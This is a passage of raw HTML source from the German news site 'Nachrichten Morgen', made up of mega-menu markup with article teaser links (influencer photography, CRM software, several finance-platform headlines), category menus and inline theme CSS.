Gestaltungsm\u00f6glichkeit F\u00fcr Eine W\u00fcrdevolle Ruhest\u00e4tte\">Urnengr\u00e4ber: Eine Moderne Gestaltungsm\u00f6glichkeit F\u00fcr Eine W\u00fcrdevolle Ruhest\u00e4tte<\/a><\/h3>\r\n                    \r\n                                            <div class=\"td-editor-date\">\r\n                                                        \r\n                                                            <span class=\"td-author-date\">\r\n                                    \r\n                                    <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2023-06-24T03:02:41+02:00\" >Juni 24, 2023<\/time><\/span>                                                                                                        <\/span>\r\n                                                    <\/div>\r\n                    \r\n                    \r\n                                    <\/div>\r\n            <\/div>\r\n        <\/div>\r\n\r\n        \r\n        <div class=\"tdb_module_header tdb_module_mm td_module_wrap td-animation-stack td-cpt-post\">\r\n            <div class=\"td-module-container td-category-pos-above\">\r\n                                    <div class=\"td-image-container\">\r\n                                                <div class=\"td-module-thumb\"><a href=\"https:\/\/nachrichtenmorgen.de\/trauerlieder\/\"  rel=\"bookmark\" class=\"td-image-wrap \" title=\"Trauerlieder : Die Bedeutung Von Liedern in Der Deutschen Trauerkultur\" ><span class=\"entry-thumb td-thumb-css \" style=\"background-image: url('https:\/\/nachrichtenmorgen.de\/wp-content\/uploads\/2023\/06\/Trauerlieder-696x376.jpg')\" ><\/span><\/a><\/div>                                            <\/div>\r\n                \r\n                <div class=\"td-module-meta-info\">\r\n                                        \r\n                    <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/nachrichtenmorgen.de\/trauerlieder\/\"  rel=\"bookmark\" title=\"Trauerlieder : Die Bedeutung Von Liedern in Der Deutschen Trauerkultur\">Trauerlieder : Die Bedeutung Von Liedern in Der Deutschen Trauerkultur<\/a><\/h3>\r\n                    \r\n                                            <div class=\"td-editor-date\">\r\n                                                        \r\n                                                            <span class=\"td-author-date\">\r\n                                    \r\n                                    <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2023-06-11T16:07:40+02:00\" >Juni 11, 2023<\/time><\/span>                                                                                                        <\/span>\r\n                                                    <\/div>\r\n                    \r\n                    \r\n                                    <\/div>\r\n            <\/div>\r\n        <\/div>\r\n\r\n        ","td_block_id":"tdi_66","td_hide_prev":true,"td_hide_next":true}));
  613.                                    </script>
  614.            <div class="tdb-mega-modules-wrap"><div id=tdi_66 class="td_block_inner">
  615.        <div class="tdb_module_header tdb_module_mm td_module_wrap td-animation-stack td-cpt-post">
  616.            <div class="td-module-container td-category-pos-above">
  617.                                    <div class="td-image-container">
  618.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-welt-der-influencer-wie-sie-mit-ihren-smartphones/"  rel="bookmark" class="td-image-wrap " title="Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren" ><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Die-Welt-der-Influencer-Wie-sie-mit-ihren-Smartphones-beeindruckende-Fotos-kreieren-696x464.jpg" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                            </div>
  619.                
  620.                <div class="td-module-meta-info">
  621.                                        
  622.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-welt-der-influencer-wie-sie-mit-ihren-smartphones/"  rel="bookmark" title="Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren">Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren</a></h3>
  623.                    
  624.                                            <div class="td-editor-date">
  625.                                                        
  626.                                                            <span class="td-author-date">
  627.                                    
  628.                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-04-30T17:22:43+02:00" >April 30, 2024</time></span>                                                                                                        </span>
  629.                                                    </div>
  630.                    
  631.                    
  632.                                    </div>
  633.            </div>
  634.        </div>
  635.  
  636.        
  637.        <div class="tdb_module_header tdb_module_mm td_module_wrap td-animation-stack td-cpt-post">
  638.            <div class="td-module-container td-category-pos-above">
  639.                                    <div class="td-image-container">
  640.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/wie-lime-technologies/"  rel="bookmark" class="td-image-wrap " title="Wie Lime Technologies die Landschaft des Kundenbeziehungsmanagements revolutioniert" ><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Wie-Lime-Technologies-die-Landschaft-des-Kundenbeziehungsmanagements-revolutioniert-696x390.jpg" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                            </div>
  641.                
  642.                <div class="td-module-meta-info">
  643.                                        
  644.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/wie-lime-technologies/"  rel="bookmark" title="Wie Lime Technologies die Landschaft des Kundenbeziehungsmanagements revolutioniert">Wie Lime Technologies die Landschaft des Kundenbeziehungsmanagements revolutioniert</a></h3>
  645.                    
  646.                                            <div class="td-editor-date">
  647.                                                        
  648.                                                            <span class="td-author-date">
  649.                                    
  650.                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-04-24T16:06:15+02:00" >April 24, 2024</time></span>                                                                                                        </span>
  651.                                                    </div>
  652.                    
  653.                    
  654.                                    </div>
  655.            </div>
  656.        </div>
  657.  
  658.        
  659.        <div class="tdb_module_header tdb_module_mm td_module_wrap td-animation-stack td-cpt-post">
  660.            <div class="td-module-container td-category-pos-above">
  661.                                    <div class="td-image-container">
  662.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/zenfund/"  rel="bookmark" class="td-image-wrap " title="ZenFund setzt fortschrittliche Technologie für intelligentere Finanztransaktionen ein" ><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/ZenFund-setzt-fortschrittliche-Technologie-fuer-intelligentere-Finanztransaktionen-ein-2-696x522.png" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                            </div>
  663.                
  664.                <div class="td-module-meta-info">
  665.                                        
  666.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/zenfund/"  rel="bookmark" title="ZenFund setzt fortschrittliche Technologie für intelligentere Finanztransaktionen ein">ZenFund setzt fortschrittliche Technologie für intelligentere Finanztransaktionen ein</a></h3>
  667.                    
  668.                                            <div class="td-editor-date">
  669.                                                        
  670.                                                            <span class="td-author-date">
  671.                                    
  672.                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-04-13T11:17:24+02:00" >April 13, 2024</time></span>                                                                                                        </span>
  673.                                                    </div>
  674.                    
  675.                    
  676.                                    </div>
  677.            </div>
  678.        </div>
  679.  
  680.        
  681.        <div class="tdb_module_header tdb_module_mm td_module_wrap td-animation-stack td-cpt-post">
  682.            <div class="td-module-container td-category-pos-above">
  683.                                    <div class="td-image-container">
  684.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/havenhold/"  rel="bookmark" class="td-image-wrap " title="Havenhold nutzt fortschrittliche Technologie für intelligentere Finanztransaktionen" ><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/03/Havenhold-nutzt-fortschrittliche-Technologie-fuer-intelligentere-Finanztransaktionen-696x464.png" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                            </div>
  685.                
  686.                <div class="td-module-meta-info">
  687.                                        
  688.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/havenhold/"  rel="bookmark" title="Havenhold nutzt fortschrittliche Technologie für intelligentere Finanztransaktionen">Havenhold nutzt fortschrittliche Technologie für intelligentere Finanztransaktionen</a></h3>
  689.                    
  690.                                            <div class="td-editor-date">
  691.                                                        
  692.                                                            <span class="td-author-date">
  693.                                    
  694.                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-03-06T08:02:04+01:00" >März 6, 2024</time></span>                                                                                                        </span>
  695.                                                    </div>
  696.                    
  697.                    
  698.                                    </div>
  699.            </div>
  700.        </div>
  701.  
  702.        
  703.        <div class="tdb_module_header tdb_module_mm td_module_wrap td-animation-stack td-cpt-post">
  704.            <div class="td-module-container td-category-pos-above">
  705.                                    <div class="td-image-container">
  706.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/taurumax/"  rel="bookmark" class="td-image-wrap " title="Taurumax Einführt Echtzeit-Signale für Kluge Transaktionsentscheidungen" ><span data-bg="https://nachrichtenmorgen.de/wp-content/uploads/2024/03/Taurumax-Einfuehrt-Echtzeit-Signale-fuer-Kluge-Transaktionsentscheidungen-2-696x464.png" class="entry-thumb td-thumb-css rocket-lazyload" style="" ></span></a></div>                                            </div>
  707.                
  708.                <div class="td-module-meta-info">
  709.                                        
  710.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/taurumax/"  rel="bookmark" title="Taurumax Einführt Echtzeit-Signale für Kluge Transaktionsentscheidungen">Taurumax Einführt Echtzeit-Signale für Kluge Transaktionsentscheidungen</a></h3>
  711.                    
  712.                                            <div class="td-editor-date">
  713.                                                        
  714.                                                            <span class="td-author-date">
  715.                                    
  716.                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-03-06T07:47:03+01:00" >März 6, 2024</time></span>                                                                                                        </span>
  717.                                                    </div>
  718.                    
  719.                    
  720.                                    </div>
  721.            </div>
  722.        </div>
  723.  
  724.        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_66" data-td_block_id="tdi_66"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_66" data-td_block_id="tdi_66"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></a></div></div></div> <!-- ./block1 --></div></li>
  725. </ul>
  726. </li>
  727. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-908"><a href="https://nachrichtenmorgen.de/category/reisen/"><div class="tdb-menu-item-text">Reisen</div></a></li>
  728. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-1486"><a href="https://nachrichtenmorgen.de/category/lebensstil/"><div class="tdb-menu-item-text">Lebensstil</div></a></li>
  729. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-909"><a href="https://nachrichtenmorgen.de/category/werbung/"><div class="tdb-menu-item-text">Werbung</div></a></li>
  730. <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-1074"><a href="https://nachrichtenmorgen.de/datenschutzbestimmungen/"><div class="tdb-menu-item-text">Datenschutzbestimmungen</div></a></li>
  731. <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-1079 tdb-menu-item-inactive"><a href="https://nachrichtenmorgen.de/kontakt/"><div class="tdb-menu-item-text">Kontakt</div></a>
  732. <ul class="sub-menu">
  733. <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item tdb-normal-menu menu-item-1084"><a href="https://nachrichtenmorgen.de/ueber-uns/"><div class="tdb-menu-item-text">Über uns!</div></a></li>
  734. </ul>
  735. </li>
  736. <li class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-4075"><a href="https://nachrichtenmorgen.de/write-for-us/"><div class="tdb-menu-item-text">Schreiben Sie für uns</div></a></li>
  737. </ul></div></div></div></div></div></div></div></div>                </div>
  738.                                    <div class="td-header-desktop-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none">
  739.                        <div id="tdi_67" class="tdc-zone"><div class="tdc_zone tdi_68  wpb_row td-pb-row" data-sticky-offset="0" >
  740. <style scoped>.tdi_68{min-height:0}.tdi_68:before{content:'';display:block;width:100vw;height:100%;position:absolute;left:50%;transform:translateX(-50%);box-shadow:0px 0px 15px 0px rgba(0,0,0,0.12);z-index:20;pointer-events:none}.td-header-desktop-sticky-wrap.td-header-active{opacity:1;transform:translateY(0);-webkit-transform:translateY(0);-moz-transform:translateY(0);-ms-transform:translateY(0);-o-transform:translateY(0)}.td-header-desktop-sticky-wrap{transform:translateY(-120%);-webkit-transform:translateY(-120%);-moz-transform:translateY(-120%);-ms-transform:translateY(-120%);-o-transform:translateY(-120%);-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out}@media (max-width:767px){.tdi_68:before{width:100%}}</style><div id="tdi_69" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_70  wpb_row td-pb-row tdc-element-style" >
  741. <style scoped>.tdi_70,.tdi_70 .tdc-columns{min-height:0}.tdi_70,.tdi_70 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_70 .tdc-columns{width:100%}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_70{margin-left:-0px;margin-right:-0px}.tdi_70 .tdc-row-video-background-error,.tdi_70>.vc_column,.tdi_70>.tdc-columns>.vc_column{padding-left:0px;padding-right:0px}}}.tdi_70{position:relative}.tdi_70 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_70{padding-left:10px!important}}</style>
  742. <div class="tdi_69_rand_style td-element-style" ><style>.tdi_69_rand_style{background-color:#ffffff!important}</style></div><div class="vc_column tdi_72  wpb_column vc_column_container tdc-column td-pb-span4">
  743. <style scoped>.tdi_72{vertical-align:baseline}.tdi_72>.wpb_wrapper,.tdi_72>.wpb_wrapper>.tdc-elements{display:block}.tdi_72>.wpb_wrapper>.tdc-elements{width:100%}.tdi_72>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_72>.wpb_wrapper{width:auto;height:auto}.tdi_72{width:25%!important}@media (min-width:768px) and (max-width:1018px){.tdi_72{width:22%!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_header_logo tdi_73 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_73" >
  744. <style>.tdi_73{padding-bottom:2px!important;z-index:0!important}</style>
  745. <style>.tdi_73 .tdb-logo-a,.tdi_73 h1{flex-direction:row}.tdi_73 .tdb-logo-a,.tdi_73 h1{align-items:flex-start;justify-content:flex-start}.tdi_73 .tdb-logo-svg-wrap{display:block}.tdi_73 .tdb-logo-img-wrap{display:none}.tdi_73 .tdb-logo-text-tagline{margin-top:0;margin-left:0px;color:#000000;font-family:Work Sans!important;font-size:10px!important;line-height:2!important;font-style:italic!important;font-weight:500!important;}.tdi_73 .tdb-logo-text-wrap{flex-direction:row;align-items:baseline;align-items:flex-start}.tdi_73 .tdb-logo-icon-svg svg{width:46px}.tdi_73 .tdb-logo-icon{top:0px;display:none}.tdi_73 .tdb-logo-text-title{color:#ec3535;font-family:PT Serif!important;font-size:35px!important;line-height:1.2!important;font-style:normal!important;font-weight:700!important;letter-spacing:-2px!important;}@media (min-width:1019px) and (max-width:1140px){.tdi_73 .tdb-logo-img{max-width:260px}.tdi_73 .tdb-logo-text-title{font-size:36px!important;letter-spacing:-3px!important;}.tdi_73 .tdb-logo-text-tagline{letter-spacing:0.5px!important;}}@media (min-width:768px) and (max-width:1018px){.tdi_73 .tdb-logo-img{max-width:180px}.tdi_73 .tdb-logo-icon{top:3px}.tdi_73 .tdb-logo-text-title{font-size:30px!important;letter-spacing:-1.5px!important;}.tdi_73 .tdb-logo-text-tagline{line-height:1.8!important;}}@media (max-width:767px){.tdi_73 .tdb-logo-text-title{font-size:42px!important;}}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://nachrichtenmorgen.de/"><h1><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">Nachrichten Morgen</span><span class="tdb-logo-text-tagline"> </span></span></h1></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_75  wpb_column vc_column_container tdc-column td-pb-span8">
  746. <style scoped>.tdi_75{vertical-align:baseline}.tdi_75>.wpb_wrapper,.tdi_75>.wpb_wrapper>.tdc-elements{display:block}.tdi_75>.wpb_wrapper>.tdc-elements{width:100%}.tdi_75>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_75>.wpb_wrapper{width:auto;height:auto}.tdi_75{width:75%!important}@media (min-width:768px) and (max-width:1018px){.tdi_75{width:78%!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap tdb_header_menu tdi_76 tds_menu_active1 tds_menu_sub_active1 tdb-mm-align-screen td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_76"  style=" z-index: 999;">
  747. <style>.tdi_76{z-index:0!important}</style>
  748. <style>.tdi_76 .td_block_inner{text-align:right}.tdi_76 .tdb-menu>li{margin-right:10px}.tdi_76 .tdb-menu>li:last-child{margin-right:0}.tdi_76 .tdb-menu-items-dropdown{margin-left:10px}.tdi_76 .tdb-menu-items-empty+.tdb-menu-items-dropdown{margin-left:0}.tdi_76 .tdb-menu>li>a,.tdi_76 .td-subcat-more{padding:0 10px;color:#000000}.tdi_76 .tdb-menu>li .tdb-menu-sep,.tdi_76 .tdb-menu-items-dropdown .tdb-menu-sep{top:-1px}.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_76 .td-subcat-more .tdb-menu-more-subicon-svg svg{width:0px}.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon,.tdi_76 .td-subcat-more .tdb-menu-more-subicon{margin-left:0px;top:0px}.tdi_76 .td-subcat-more .tdb-menu-more-icon-svg svg{width:13px}.tdi_76 .td-subcat-more .tdb-menu-more-icon{top:0px}.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .td-subcat-more .tdb-menu-more-subicon-svg svg,.tdi_76 .td-subcat-more .tdb-menu-more-subicon-svg svg *,.tdi_76 .td-subcat-more .tdb-menu-more-icon-svg,.tdi_76 .td-subcat-more .tdb-menu-more-icon-svg *{fill:#000000}.tdi_76 .tdb-menu>li>a,.tdi_76 .td-subcat-more,.tdi_76 .td-subcat-more>.tdb-menu-item-text{font-family:Work Sans!important;font-size:14px!important;line-height:54px!important;font-weight:600!important;text-transform:none!important}.tdi_76 .tdb-menu .tdb-normal-menu ul .tdb-menu-item>a,.tdi_76 .tdb-menu-items-dropdown .td-pulldown-filter-list li>a{padding:5px 25px}.tdi_76 .tdb-normal-menu ul .tdb-menu-item>a .tdb-sub-menu-icon,.tdi_76 .td-pulldown-filter-list .tdb-menu-item>a .tdb-sub-menu-icon{right:0;margin-top:1px}.tdi_76 .tdb-menu .tdb-normal-menu ul,.tdi_76 .td-pulldown-filter-list,.tdi_76 .td-pulldown-filter-list .sub-menu{box-shadow:0px 2px 16px 0px rgba(0,0,0,0.12)}.tdi_76 .tdb-menu .tdb-normal-menu ul .tdb-menu-item>a,.tdi_76 .td-pulldown-filter-list li a{font-family:Work Sans!important;font-size:13px!important;line-height:2!important;font-weight:600!important}.tdi_76:not(.tdb-mm-align-screen) .tdb-mega-menu .sub-menu,.tdi_76 .tdb-mega-menu .sub-menu>li{max-width:1392px!important}.tdi_76 .tdb-mega-menu-page>.sub-menu>li{padding:20px}.tdi_76 .tdb-mega-menu .tdb_header_mega_menu{margin-left:0}.tdi_76 .tdb-menu .tdb-mega-menu .sub-menu>li{border-width:0px;box-shadow:0px 4px 16px 0px rgba(0,0,0,0.12)}@media (min-width:1019px) and (max-width:1140px){.tdi_76 .tdb-menu>li{margin-right:8px}.tdi_76 .tdb-menu>li:last-child{margin-right:0}.tdi_76 .tdb-menu-items-dropdown{margin-left:8px}.tdi_76 .tdb-menu-items-empty+.tdb-menu-items-dropdown{margin-left:0}.tdi_76 .tdb-menu>li>a,.tdi_76 .td-subcat-more{padding:0 8px}.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_76 .td-subcat-more .tdb-menu-more-subicon-svg svg{width:9px}.tdi_76 .td-subcat-more .tdb-menu-more-icon-svg svg{width:12px}.tdi_76 .tdb-menu>li>a,.tdi_76 .td-subcat-more,.tdi_76 .td-subcat-more>.tdb-menu-item-text{line-height:50px!important}.tdi_76:not(.tdb-mm-align-screen) .tdb-mega-menu .sub-menu,.tdi_76 .tdb-mega-menu .sub-menu>li{max-width:100%!important}}@media (min-width:768px) and (max-width:1018px){.tdi_76 .tdb-menu>li{margin-right:5px}.tdi_76 .tdb-menu>li:last-child{margin-right:0}.tdi_76 .tdb-menu-items-dropdown{margin-left:5px}.tdi_76 .tdb-menu-items-empty+.tdb-menu-items-dropdown{margin-left:0}.tdi_76 .tdb-menu>li>a,.tdi_76 .td-subcat-more{padding:0 5px}.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon-svg svg,.tdi_76 .td-subcat-more .tdb-menu-more-subicon-svg svg{width:8px}.tdi_76 .tdb-menu>li>a .tdb-sub-menu-icon,.tdi_76 .td-subcat-more .tdb-menu-more-subicon{margin-left:6px}.tdi_76 .td-subcat-more .tdb-menu-more-icon-svg svg{width:11px}.tdi_76 .tdb-menu>li>a,.tdi_76 .td-subcat-more,.tdi_76 .td-subcat-more>.tdb-menu-item-text{font-size:13px!important;line-height:45px!important}.tdi_76 .tdb-menu .tdb-normal-menu ul .tdb-menu-item>a,.tdi_76 .td-pulldown-filter-list li a{font-size:12px!important}.tdi_76:not(.tdb-mm-align-screen) .tdb-mega-menu .sub-menu,.tdi_76 .tdb-mega-menu .sub-menu>li{max-width:100%!important}.tdi_76 .tdb-mega-menu-page>.sub-menu>li{padding:15px}}</style>
  749. <style>.tdi_76 .tdb-menu>li.current-menu-item>a,.tdi_76 .tdb-menu>li.current-menu-ancestor>a,.tdi_76 .tdb-menu>li.current-category-ancestor>a,.tdi_76 .tdb-menu>li.current-page-ancestor>a,.tdi_76 .tdb-menu>li:hover>a,.tdi_76 .tdb-menu>li.tdb-hover>a,.tdi_76 .tdb-menu-items-dropdown:hover .td-subcat-more{color:#f43f3f}.tdi_76 .tdb-menu>li.current-menu-item>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu>li.current-menu-item>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu>li.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu>li.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu>li.current-category-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu>li.current-category-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu>li.current-page-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu>li:hover>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu>li:hover>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu>li.tdb-hover>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu>li.tdb-hover>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu-items-dropdown:hover .td-subcat-more .tdb-menu-more-icon-svg svg,.tdi_76 .tdb-menu-items-dropdown:hover .td-subcat-more .tdb-menu-more-icon-svg svg *{fill:#f43f3f}.tdi_76 .tdb-menu>li>a:after,.tdi_76 .tdb-menu-items-dropdown .td-subcat-more:after{height:0px;bottom:50px}</style>
  750. <style>.tdi_76 .tdb-menu ul .tdb-normal-menu.current-menu-item>a,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor>a,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-category-ancestor>a,.tdi_76 .tdb-menu ul .tdb-normal-menu.tdb-hover>a,.tdi_76 .tdb-menu ul .tdb-normal-menu:hover>a,.tdi_76 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover>a{color:#f43f3f}.tdi_76 .tdb-menu ul .tdb-normal-menu.current-menu-item>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-menu-item>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-category-ancestor>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu ul .tdb-normal-menu.current-category-ancestor>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu ul .tdb-normal-menu.tdb-hover>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu ul .tdb-normal-menu.tdb-hover>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu ul .tdb-normal-menu:hover>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu ul .tdb-normal-menu:hover>a .tdb-sub-menu-icon-svg svg *,.tdi_76 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover>a .tdb-sub-menu-icon-svg svg,.tdi_76 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover>a .tdb-sub-menu-icon-svg svg *{fill:#f43f3f}</style><div id=tdi_76 class="td_block_inner td-fix-index"><ul id="menu-td-demo-header-menu-2" class="tdb-block-menu tdb-menu tdb-menu-items-visible"><li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-cur-menu-item menu-item-first tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-935"><a href="https://nachrichtenmorgen.de/category/nachricht/"><div class="tdb-menu-item-text">Nachricht</div></a></li>
  751. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-936"><a href="https://nachrichtenmorgen.de/category/prominente/"><div class="tdb-menu-item-text">Prominente</div></a></li>
  752. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-937"><a href="https://nachrichtenmorgen.de/category/reisen/"><div class="tdb-menu-item-text">Reisen</div></a></li>
  753. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-938"><a href="https://nachrichtenmorgen.de/category/gesundheit/"><div class="tdb-menu-item-text">Gesundheit</div></a></li>
  754. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-939"><a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/"><div class="tdb-menu-item-text">Finanzen und Vertrag</div></a></li>
  755. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-940"><a href="https://nachrichtenmorgen.de/category/essen/"><div class="tdb-menu-item-text">Essen</div></a></li>
  756. <li class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-941"><a href="https://nachrichtenmorgen.de/category/marketing/"><div class="tdb-menu-item-text">Marketing</div></a></li>
  757. </ul></div></div></div></div></div></div></div></div>                    </div>
  758.                            </div>
  759.                    
  760.            <div class="td-main-content-wrap td-main-page-wrap td-container-wrap">
  761.                <div class="tdc-content-wrap">
  762.                    <div id="tdi_79" class="tdc-zone"><div class="tdc_zone tdi_80  wpb_row td-pb-row"  >
  763. <style scoped>.tdi_80{min-height:0}</style><div id="tdi_81" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_82  wpb_row td-pb-row tdc-element-style" >
  764. <style scoped>.tdi_82,.tdi_82 .tdc-columns{min-height:0}.tdi_82,.tdi_82 .tdc-columns{display:block}.tdi_82 .tdc-columns{width:100%}.tdi_82{padding-top:30px!important;padding-right:60px!important;padding-bottom:120px!important;padding-left:60px!important;position:relative}.tdi_82 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_82{padding-top:20px!important;padding-bottom:110px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_82{padding-top:15px!important;padding-bottom:100px!important}}@media (max-width:767px){.tdi_82{padding-right:50px!important;padding-bottom:30px!important;padding-left:50px!important}}</style>
  765. <div class="tdi_81_rand_style td-element-style" ><style>.tdi_81_rand_style{background-color:#f7f7f7!important}</style></div><div class="vc_column tdi_84  wpb_column vc_column_container tdc-column td-pb-span12">
  766. <style scoped>.tdi_84{vertical-align:baseline}.tdi_84>.wpb_wrapper,.tdi_84>.wpb_wrapper>.tdc-elements{display:block}.tdi_84>.wpb_wrapper>.tdc-elements{width:100%}.tdi_84>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_84>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" ><div class="td_block_wrap td_flex_block_1 tdi_85 td_with_ajax_pagination td-pb-border-top td-week-slider td_block_template_1 td_ajax_preloading_preload td_flex_block"  data-td-block-uid="tdi_85" >
  767. <style>.tdi_85{margin-bottom:0px!important}</style>
